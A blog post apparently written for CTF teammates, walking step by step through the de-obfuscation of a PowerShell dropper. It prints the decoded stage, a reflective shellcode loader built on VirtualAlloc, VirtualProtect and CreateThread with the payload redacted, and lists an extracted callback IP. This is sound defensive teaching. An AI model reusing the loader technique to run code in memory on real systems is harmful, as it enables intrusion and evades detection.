Digging into some obfuscated PowerShell
Recently at an infosec conference I had the opportunity to participate in a defensive CTF style exercise with a few teammates. I told those teammates that I would send them some information on how to de-obfuscate a piece of potentially malicious PowerShell code one of them found during the exercise, so this post is in regard to that.
Apologies for the wall of text, but if you are interested I tried to provide quite a bit of detail.
We saved a piece of PowerShell during the exercise that looked like the snippet below. The code has been redacted because AV flags it as malware, and the full code is not needed for the explanation. It was part of a larger PowerShell script that ran on a compromised endpoint in our exercise scenario.
-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOlEZWcCA7VX7W/a{2}hj/Pqn/gzUhYTQ''...[REDACTED]...''vwE4wfSu6QwAAA{0}{0}'')-f''='',''r'',''R'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
This code followed the PowerShell executable on the command line, so originally it looked more like this.
powershell.exe -nop -w hidden -c {Rest of the crazy code here}
For starters I wanted to explain the arguments used here.
-nop
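This is shorthand for the full argument -NoProfile and instructs PowerShell to launch without loading any profile scripts. The table below lists the profile scripts PowerShell normally looks for at startup (PowerShell 7 paths are shown; Windows PowerShell 5.1 uses Documents\WindowsPowerShell instead).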
Scope | Typical Location |
---|---|
Current User, Current Host | $HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 |
Current User, All Hosts | $HOME\Documents\PowerShell\profile.ps1 |
All Users, Current Host | $PSHOME\Microsoft.PowerShell_profile.ps1 |
All Users, All Hosts | $PSHOME\profile.ps1 |
Current/All Users is self-explanatory, but Hosts in this context may be a bit misleading. When we say host here, what we really mean is the environment or shell that is running PowerShell. PowerShell can be launched in many ways, and although you can access the same functionality from any of these environments, they are not the same. This is very important to understand in security, because a control that blocks “powershell.exe” does not, by default, block PowerShell running in another host.
As an example these are some of the ways you can access PowerShell that would take advantage of different profile script paths as shown above.
- powershell.exe - the classic PowerShell console
- PowerShell ISE - the scripting editor (Integrated Scripting Environment)
- VSCode PowerShell extension - if you’re running PowerShell inside Visual Studio Code
- Custom apps - anything that embeds PowerShell (like certain admin tools)
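To see which profile scripts a given host would load, you can ask the host itself. This is a small sketch, assuming a standard host where the automatic $PROFILE variable is populated; the $scopes and $profileReport names are just for illustration.

```powershell
# $PROFILE is a string that carries four extra properties, one per scope/host pair.
$scopes = 'AllUsersAllHosts', 'AllUsersCurrentHost', 'CurrentUserAllHosts', 'CurrentUserCurrentHost'

$profileReport = foreach ($scope in $scopes) {
    $path = $PROFILE.$scope
    [pscustomobject]@{
        Scope  = $scope
        Path   = $path
        # A missing file simply means no profile script is defined for that scope.
        Exists = [bool]($path -and (Test-Path -LiteralPath $path))
    }
}

$profileReport | Format-Table -AutoSize
```

Running this in two different hosts (for example the console and the VSCode extension) should show different "Current Host" paths, which is the whole point of the distinction.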
The important thing to take away from the exercise is that -nop is generally a measure attackers take to try to avoid detection. Many admins and security tools load their own code in these profile scripts to add security hooks or aid detection by other means, so it's in an attacker's best interest to avoid them.
-w hidden
Short for -WindowStyle Hidden.
This does what it says on the tin: it hides the window from the user. It is often used legitimately to run background tasks, but it is also commonly used by malicious scripts so the user does not see a window open on their screen.
-c
Short for -Command. This just tells PowerShell that what follows ({Insert crazy code here}) should be run as a PowerShell command. Admins will more often save scripts that need to be run and call them directly, like powershell.exe -File "C:\path\to\your\script.ps1". Malicious actors, however, often use -c because the script text is passed on the command line and executed in memory, meaning nothing needs to be saved to the machine and no script file is created, which also aids in avoiding detection. Luckily most modern antivirus and protection suites have long since adjusted to also look at the computer's memory, and anything actually malicious is usually picked up, but this is not foolproof.
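If you want to hunt for this combination of arguments in process logs, a rough heuristic might look like the sketch below. The function name Get-SuspiciousFlag and the patterns are my own assumptions; they only cover the spellings seen in this sample plus the full parameter names, and PowerShell accepts other abbreviations too, so treat it as a starting point and not a complete detection.

```powershell
function Get-SuspiciousFlag {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Hypothetical patterns: short form from the sample, or the full parameter name.
    $patterns = [ordered]@{
        NoProfile    = '(^|\s)-nop(rofile)?(\s|$)'
        HiddenWindow = '(^|\s)-w(indowstyle)?\s+hidden(\s|$)'
        Command      = '(^|\s)-c(ommand)?(\s|$)'
    }

    foreach ($name in $patterns.Keys) {
        # -match is case-insensitive by default in PowerShell.
        if ($CommandLine -match $patterns[$name]) { $name }
    }
}

Get-SuspiciousFlag 'powershell.exe -nop -w hidden -c Get-Date'
```

Any one of these flags on its own is common in legitimate automation; it is the combination, together with an encoded blob, that makes a command line worth a closer look.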
De-obfuscation
On to the main event. When we are de-obfuscating code there are two ways to go about it: static (the safest option) or dynamic (where we actively evaluate parts of the code by running it to see what it does). Static analysis means dissecting each part of the code and reversing what has been done to it, so we get the full picture without ever needing to run it. Dynamic analysis can speed things up because you are actively running all or parts of the suspicious code to let it reveal itself, but often at the cost of security, or even at the risk of missing some of its actions if it's doing more than one thing.
Regardless of method, but doubly so for dynamic, I would advise de-obfuscating potentially malicious code only on a safe non-networked lab machine set up for that purpose. I will be using my own personal lab computer to do this work.
Dynamic analysis example of running the code:
$secret = ([char]72)+([char]101)+([char]108)+([char]108)+([char]111)
$secret
Hello
Static analysis example of just figuring it out:
$secret = ([char]72)+([char]101)+([char]108)+([char]108)+([char]111)
We look up an ASCII table online and compare the character codes shown with the online table.
72 = Uppercase H
101 = Lowercase e
108 = Lowercase l
111 = Lowercase o
So we know it spells out 'Hello'
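The lookup above can also be done in PowerShell without evaluating the suspicious expression at all. A minimal sketch, assuming we hold the obfuscated code as plain text in a variable (the names $obfuscated, $codes and $decoded are mine): we only pull the numbers out with a regex and translate them, nothing from the sample is executed.

```powershell
# The suspicious code is kept as a string, it is never run.
$obfuscated = '([char]72)+([char]101)+([char]108)+([char]108)+([char]111)'

# Extract every number that follows a [char] cast.
$codes = [regex]::Matches($obfuscated, '\[char\](\d+)') |
    ForEach-Object { [int]$_.Groups[1].Value }

# Translate each character code and join the characters into one string.
$decoded = -join ($codes | ForEach-Object { [char]$_ })
$decoded
```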
Often we will need to combine static and dynamic analysis, taking small shortcuts where we have the experience to know it's safe to do so.
Back to our funky code.
When we analyze code we first remove what is junk for our purposes and then work from the inside out: the innermost expression is evaluated first, and each additional operation is applied in an outward manner.
First we will extract just the body of the code and leave the PowerShell arguments behind. Remove '-nop -w hidden -c &( from the beginning and remove )'; from the end, as they are the matching parenthesis and single quote from the other end.
With that done, it helps to work in a code editor that understands bracket matching, like VSCode or something similar. These editors highlight matching pairs of parentheses or brackets, so you can more easily see where expressions start and end.
In PowerShell, parentheses () group expressions and force evaluation from the inside out: (RunsLast(RunsSecond(InnermostRunsFirst))). Curly braces {} normally denote code blocks (script blocks), which can complicate things because they add the need to diagram execution flow as well. Luckily we don’t have a code block in this example, but we do have curly braces used in another special case, which is one of the first things we need to address in our attempt to de-obfuscate the code.
First let's find our innermost expression. Look along the string of code; sometimes it's fairly apparent where the center expression is, because it contains the bulk of the obfuscated code as some form of encoded string, which looks like a long line of unreadable letters and numbers. If it's not so obvious, you need to follow the code down the line. In our example we are dealing with multiple expressions encapsulating one another, so we look for the opening of an expression by finding the open parenthesis ( marks, and keep going until we hit the first closed parenthesis ). The text between the last open parenthesis and that first closed parenthesis is usually the innermost expression.
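If the nesting is too deep to follow by eye, a regex can point at the innermost group for you. This is only a sketch on a toy string, and it assumes there are no parentheses hidden inside quoted strings, which would confuse it. The variable names are mine.

```powershell
$expression = '(RunsLast(RunsSecond(InnermostRunsFirst)))'

# A group with no other parentheses inside it has to be an innermost one.
$innermost = [regex]::Matches($expression, '\([^()]*\)') |
    ForEach-Object { $_.Value }

$innermost
```

On real samples there can be several innermost groups side by side; sorting the matches by length usually surfaces the big encoded blob first.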
This innermost expression looks like this.
("H4sIAOlEZWcCA7VX7W/a{2}hj/Pqn/gzUhYTQ"+"CdkNoU2nSzmAXp5gAxibA0HSxz/aFs03sc4Bs/"+"d... [REDACTED] ...h9{1}sSSWme4Pnq/MuDF0P0x0Ewx5QDoQ1jjZHjE+t1JE6V8jLGEB6ohOC0xH+O64KfjeAdWw7W"+"vwE4wfSu6QwAAA{0}{0}")
This part is very straightforward to start. It is a bunch of strings in double quotes being appended to one another to make one large string, so the first thing we do is remove all of the quotes and the string addition operators that sit outside of those quotes. Be careful not to remove the + signs from inside the strings themselves, as these are important to the data.
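Doing this by hand on a long blob is error prone, so here is a hedged sketch of the same cleanup as a text replacement. The input is a shortened toy version built from the tail of our expression, held as plain text and never executed; the variable names are mine.

```powershell
# Shortened toy input: two quoted fragments joined with +, one of them containing a + as data.
$fragmented = '("xH+O64KfjeAdWw7W"+"vwE4wfSu6QwAAA{0}{0}")'

# Remove only the quote-plus-quote seams between fragments.
# A + that is part of the data has no quotes around it, so it is left alone.
$joined = $fragmented -replace '"\s*\+\s*"', ''

# Strip the wrapping parentheses and the outer quotes.
$cleaned = $joined.Trim([char[]]'()"')
$cleaned
```

Applied to the full expression, the same cleanup gives the string below.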
"H4sIAOlEZWcCA7VX7W/a{2}hj/Pqn... [REDACTED] ...ez/7h9{1}sSSWme4Pnq/MuDF0P0x0Ewx5QDoQ1jjZHjE+t1JE6V8jLGEB6ohOC0xH+O64KfjeAdWw7WvwE4wfSu6QwAAA{0}{0}"
Now let's deal with those weird curly brackets. If we look at the next outward expression it shows -f"=","r","R". The -f here is the format operator, and the items in quotes afterwards are the values used to format the string. As in many programming languages, we index from (start at) 0 when counting up: 0, 1, 2, 3, etc. So this format expression tells PowerShell to replace each placeholder {0}, {1}, {2} in our crazy long string with the value at that index. Anywhere in our string we see {0} needs to be replaced with =, {1} needs to be r, and {2} needs to be R.
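Since the format operator only transforms text, it is reasonably safe to let PowerShell do the substitution for us. A small sketch using three short pieces taken from our string (the $templates and $formatted names are mine):

```powershell
# Three short pieces of the blob, one for each placeholder.
$templates = '7W/a{2}hj/Pqn', 'h9{1}sSSWme4', 'Su6QwAAA{0}{0}'

# {0} becomes '=', {1} becomes 'r', {2} becomes 'R'.
$formatted = $templates | ForEach-Object { $_ -f '=', 'r', 'R' }
$formatted
```

Hiding the trailing = padding this way is a neat trick on the attacker's part, because those two characters at the end are one of the easiest ways to spot Base64.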
Our string after making those updates.
"H4sIAOlEZWcCA7VX7W/aRhj/Pqn... [REDACTED] ...ez/7h9rsSSWme4Pnq/MuDF0P0x0Ewx5QDoQ1jjZHjE+t1JE6V8jLGEB6ohOC0xH+O64KfjeAdWw7WvwE4wfSu6QwAAA=="
This is a Base64 encoded string. It's pretty recognizable to programmers and developers, as Base64 is mainly used to represent binary data as plain text so it can be sent and received across networks and web servers using a character set that is safe for that type of job.
You don’t need to be able to recognize that on your own though, because if we look at our next outward expression we can see that it's calling [System.Convert]::FromBase64String, so we know that the next step is to convert from a Base64 string. This step is safe to do dynamically because we are only transforming the data and not executing it.
You can also use online tools to convert Base64 data, but keep confidentiality in mind. If you find encoded data someplace like at work, you should never use the internet to decode it: you don’t know what it contains, and processing potentially sensitive data on a non-work owned system could reveal information to the public, or to the owner of a public server, that you don’t want them to see. Base64 is used in all kinds of applications, so there is no telling what’s in the data before you decode it. It could hold account numbers, usernames, confidential data, you name it.
I will use PowerShell to decode the data and assign it to a new variable for me to look at.
$NewString = [System.Convert]::FromBase64String("H4sIAOlEZWc...{rest of base64 string here}...Su6QwAAA==")
What we get is a very long list of numbers.
$NewString
31
139
8
0
233
68
101
103
2
3
181
87
237
111
218
70
24
255
.
.
.
So now we need to look at our next outward expression, New-Object System.IO.MemoryStream(), which wraps a byte array in a stream so it can be read and written like a file, but only in memory. So our big list of numbers is a byte array representing a file. This can be a little tricky: bytes represent computer data, but that data is not always human readable, so this is not as straightforward as just decoding each number to a letter or number.
To further complicate things, if we look at our next outward expression we see New-Object System.IO.Compression.GzipStream({Our_Byte_String_here}),[System.IO.Compression.CompressionMode]::Decompress
which means the code is using gzip to decompress the data we have here. The byte array is essentially a gzip compressed file, similar in spirit to a zip file but holding a single compressed stream.
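Before pointing these classes at a suspicious blob, it can be worth checking the whole pipeline on harmless data. The sketch below builds its own test input (a made-up string, nothing from the sample), compresses and Base64 encodes it the way an attacker might, then reverses it with the same classes the sample uses. All variable names here are mine.

```powershell
# Harmless stand-in for a payload; it is only compressed and decoded, never executed.
$plain = 'Write-Output "harmless test"'
$raw   = [System.Text.Encoding]::UTF8.GetBytes($plain)

# Pack: gzip into memory, then Base64 encode.
$packed = New-Object System.IO.MemoryStream
$gzip   = New-Object System.IO.Compression.GZipStream($packed, [System.IO.Compression.CompressionMode]::Compress)
$gzip.Write($raw, 0, $raw.Length)
$gzip.Dispose()   # disposing flushes the remaining compressed data and the gzip trailer
$b64 = [System.Convert]::ToBase64String($packed.ToArray())

# Unpack: Base64 decode, wrap the bytes in a MemoryStream, gunzip, read as text.
$bytes    = [System.Convert]::FromBase64String($b64)
$inStream = New-Object System.IO.MemoryStream(,$bytes)
$gunzip   = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
$reader   = New-Object System.IO.StreamReader($gunzip)
$roundTrip = $reader.ReadToEnd()
$reader.Dispose()

$b64.Substring(0, 4)   # same leading characters as our sample's blob
$roundTrip
```

The first three bytes of a gzip stream using deflate are 1F 8B 08, which Base64 always encodes as H4sI, so a blob starting with those four characters is a strong hint that gzip is involved.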
Another way to confirm this is gzip, if it were not obvious from the code, is through the concept of a file signature, or magic bytes as they are commonly called. Many file types use a byte signature in their header: the first few bytes of a file may denote what kind of file it is, and sometimes other information. There is no standard size for a header, but magic bytes are generally within the first 8 bytes of data. Lookup tables usually list them in hexadecimal, so we will convert the values.
If we convert the first 8 numbers to hexadecimal we get the following.
$bytes = 31,139,8,0,233,68,101,103
$hexArray = $bytes | ForEach-Object { $_.ToString("X2") }
$hexArray
1F
8B
08
00
E9
44
65
67
This takes each byte and calls ToString on it, where “X” means convert to hex and “2” means pad to at least 2 digits, so we get a leading 0 where needed, giving us values like 08 instead of 8. This is just cleaner, as hex bytes are normally written as two characters.
If we look up the file signature online for a gzip compressed file we can see that gzip files start with 1F 8B.
Some common magic bytes
File Type | Magic Bytes | Size |
---|---|---|
GZIP | 1F 8B | 2 bytes |
PNG | 89 50 4E 47 0D 0A 1A 0A | 8 bytes |
EXE (PE file) | 4D 5A | 2 bytes |
ZIP | 50 4B 03 04 | 4 bytes |
JPEG | FF D8 | 2 bytes |
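The lookup can be scripted as well. Below is a minimal sketch that compares the start of a byte array against the signatures in the table; the function name Get-MagicType and the $signatures table are my own, and a real tool would know far more formats.

```powershell
# Signatures from the table above, longest first so short ones cannot shadow long ones.
$signatures = [ordered]@{
    'PNG'           = 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A
    'ZIP'           = 0x50, 0x4B, 0x03, 0x04
    'GZIP'          = 0x1F, 0x8B
    'EXE (PE file)' = 0x4D, 0x5A
    'JPEG'          = 0xFF, 0xD8
}

function Get-MagicType {
    param([Parameter(Mandatory)][byte[]]$Bytes)

    foreach ($name in $signatures.Keys) {
        $sig = $signatures[$name]
        if ($Bytes.Length -lt $sig.Count) { continue }   # not enough data to compare

        $isMatch = $true
        for ($i = 0; $i -lt $sig.Count; $i++) {
            if ($Bytes[$i] -ne $sig[$i]) { $isMatch = $false; break }
        }
        if ($isMatch) { return $name }
    }
    return 'unknown'
}

# The first 8 bytes of our decoded blob.
Get-MagicType ([byte[]](31, 139, 8, 0, 233, 68, 101, 103))
```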
If we go ahead and decompress that byte blob we can see what's waiting for us.
$NewFile = (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,$NewString)),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
$NewFile
function cCO {
Param ($aJH, $s3Z)
$jR = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $jR.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($jR.GetMethod('GetModuleHandle')).Invoke($null, @($aJH)))), $s3Z))
}
function daVL {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $kbl,
[Parameter(Position = 1)] [Type] $akhY = [Void]
)
$aI = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$aI.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $kbl).SetImplementationFlags('Runtime, Managed')
$aI.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $akhY, $kbl).SetImplementationFlags('Runtime, Managed')
return $aI.CreateType()
}
[Byte[]]$lS = [System.Convert]::FromBase64String("/EiD5P... [REDACTED] ...LWiVv/V")
[Uint32]$tZEE = 0
$fQDR6 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll VirtualAlloc), (daVL @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $lS.Length,0x3000, 0x04)
[System.Runtime.InteropServices.Marshal]::Copy($lS, 0, $fQDR6, $lS.length)
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll VirtualProtect), (daVL @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($fQDR6, [Uint32]$lS.Length, 0x10, [Ref]$tZEE)) -eq $true) {
$fuAm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll CreateThread), (daVL @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$fQDR6,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((cCO kernel32.dll WaitForSingleObject), (daVL @([IntPtr], [Int32]))).Invoke($fuAm,0xffffffff) | Out-Null
}
So it turns out our initial PowerShell code was a simple dropper file, meaning it was just a stub program used to build or retrieve other code and run it.
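A few things immediately stand out. The bulk of this code is used to find the memory addresses of native Windows API functions and turn them into callable function pointers (GetProcAddress, GetDelegateForFunctionPointer). We also see references to Reflection, a common technique used by malware and attackers to dynamically load and execute code using the system’s own runtime mechanisms and function calls, often avoiding traditional detection methods. The script then calls VirtualAlloc, VirtualProtect, CreateThread and WaitForSingleObject, which is the usual pattern for copying bytes into memory, marking them executable, and running them.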
I will go ahead and tell you that the Base64 string in this section of code is raw assembly shellcode. This is now in the territory of reverse engineering which is far more complicated, but there are still a few things we can quickly look at with the data at hand.
On Linux systems there is a command called strings which outputs all of the human readable strings from a binary. If the attacker hardcoded any information into the shellcode, such as URLs, IP addresses, or anything else, it will often show up when using strings. We can replicate that behavior in PowerShell without ever writing the binary to disk.
The code below converts the Base64 string to bytes and stores them in a variable called bytes. We then loop over each byte and check whether its decimal value falls between 32 and 126 (the range of printable ASCII characters). If it does, we convert it to its character; if not, we emit a space instead. The results are joined into the variable ascii. After that we split the entire string on whitespace and print every piece longer than 3 characters as a readable line.
$bytes = [System.Convert]::FromBase64String("/EiD5P... [REDACTED] ...LWiVv/V")
$ascii = -join ($bytes | ForEach-Object {
if ($_ -ge 32 -and $_ -le 126) { [char]$_ } else { ' ' }
})
$asciiStrings = $ascii -split '\s+' | Where-Object { $_.Length -gt 3 }
$asciiStrings
AQAPRH1
QVeH
JJH1
RAQH
AXAX^YZAXAYAZH
XAYZH
wininet
SZM1
11.0.8.101
/oHUt8Ca1NjpMEE0SK3UI-AQle2OsuqZsGykYmBjxup
SZAXM1
PSSI
SYj@ZI
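One side effect of the approach above is that a readable string containing spaces gets cut into pieces, because we split on whitespace. A variation that behaves a little more like the Linux strings command is sketched below; the function name Get-PrintableString is mine, and the demo bytes are made up for illustration, not taken from the shellcode.

```powershell
function Get-PrintableString {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [int]$MinLength = 4
    )

    # Map every byte to the character with the same code, so nothing is lost or merged.
    $text = -join ($Bytes | ForEach-Object { [char]$_ })

    # Keep runs of printable ASCII (space through ~) of at least $MinLength characters.
    [regex]::Matches($text, "[\x20-\x7E]{$MinLength,}") | ForEach-Object { $_.Value }
}

# Made-up demo data: two readable strings separated by non-printable bytes.
$demo = [byte[]](0, 1) +
        [System.Text.Encoding]::ASCII.GetBytes('wininet') +
        [byte[]](0, 255) +
        [System.Text.Encoding]::ASCII.GetBytes('GET /a b') +
        [byte[]](0)

Get-PrintableString -Bytes $demo
```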
Here we can see what looks like an IP address, 11.0.8.101, likely one controlled by the attacker for the shellcode to call back to. We can also see another long string, /oHUt8Ca1NjpMEE0SK3UI-AQle2OsuqZsGykYmBjxup, that may be nothing but is worth making a note of. Since it starts with / and wininet (the Windows internet API library) appears just before it, it could be a URL path requested from that address. Using these values we can use other tools like Splunk and firewalls to check for and block activity to and from that IP address, or look for network calls that contain that wonky string as some sort of beacon.
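When the list of strings is long, picking out the interesting ones by eye gets tedious. A rough sketch of filtering for IP-looking and path-looking values follows; the input is a few of the strings from the output above, and the variable names and patterns are my own assumptions.

```powershell
# A few of the strings recovered from the shellcode.
$asciiStrings = 'wininet', 'SZM1', '11.0.8.101', '/oHUt8Ca1NjpMEE0SK3UI-AQle2OsuqZsGykYmBjxup'

# Four dot-separated numbers where no part is larger than 255.
$ipLike = $asciiStrings | Where-Object {
    $_ -match '^\d{1,3}(\.\d{1,3}){3}$' -and
    -not ($_.Split('.') | Where-Object { [int]$_ -gt 255 })
}

# Anything that starts with a slash could be a URL path.
$pathLike = $asciiStrings | Where-Object { $_.StartsWith('/') }

$ipLike
$pathLike
```

These are only candidates; each one still needs a human to decide whether it is a real indicator before it goes into a block list or a search.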
And that's it for now. I have a few older posts on reverse engineering binaries that can give you an idea of what that looks like, but we will stop this project here. I hope this information was somewhat useful and a tad bit interesting at the very least.